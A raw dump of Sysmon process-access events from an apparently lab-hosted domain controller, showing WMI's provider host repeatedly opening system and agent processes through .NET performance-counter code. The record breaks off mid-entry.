10341000x80000000000000006528Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:48.670{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-85A6-5FCF-F000-000000009101}4836C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006527Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:48.670{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-85A6-5FCF-F000-000000009101}4836C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006526Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:48.670{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-85A6-5FCF-EF00-000000009101}4148C:\Windows\system32\WinrsHost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006525Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:48.670{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-85A6-5FCF-EF00-000000009101}4148C:\Windows\system32\WinrsHost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006524Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:48.670{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-85A5-5FCF-EE00-000000009101}2796C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006523Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:48.670{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-85A5-5FCF-EE00-000000009101}2796C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006522Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:48.670{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-85A4-5FCF-ED00-000000009101}2772C:\Windows\system32\wbem\WmiApSrv.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006521Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:48.670{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-85A4-5FCF-ED00-000000009101}2772C:\Windows\system32\wbem\WmiApSrv.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006520Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:48.670{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8575-5FCF-8600-000000009101}4628C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006519Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:48.670{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8575-5FCF-8600-000000009101}4628C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006518Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:48.670{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8575-5FCF-8500-000000009101}4616C:\Windows\system32\WinrsHost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006517Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:48.670{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8575-5FCF-8500-000000009101}4616C:\Windows\system32\WinrsHost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006516Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:48.670{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-855E-5FCF-7D00-000000009101}652C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006515Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:48.670{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-855E-5FCF-7D00-000000009101}652C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006514Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:48.670{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8552-5FCF-4100-000000009101}2804C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006513Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:48.670{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8552-5FCF-4100-000000009101}2804C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006512Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:48.670{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8551-5FCF-3800-000000009101}3612C:\Windows\System32\vds.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006511Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:48.670{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8551-5FCF-3800-000000009101}3612C:\Windows\System32\vds.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006510Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:48.670{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8551-5FCF-3600-000000009101}3344C:\Windows\system32\wbem\unsecapp.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006509Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:48.670{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8551-5FCF-3600-000000009101}3344C:\Windows\system32\wbem\unsecapp.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006508Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:48.670{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8551-5FCF-3500-000000009101}3240C:\Program Files\Amazon\XenTools\LiteAgent.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006507Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:48.670{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8551-5FCF-3500-000000009101}3240C:\Program Files\Amazon\XenTools\LiteAgent.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006506Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:48.670{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8551-5FCF-3400-000000009101}3224C:\Windows\system32\dfssvc.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006505Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:48.670{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8551-5FCF-3400-000000009101}3224C:\Windows\system32\dfssvc.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006504Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:48.670{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8551-5FCF-3300-000000009101}3080C:\Program 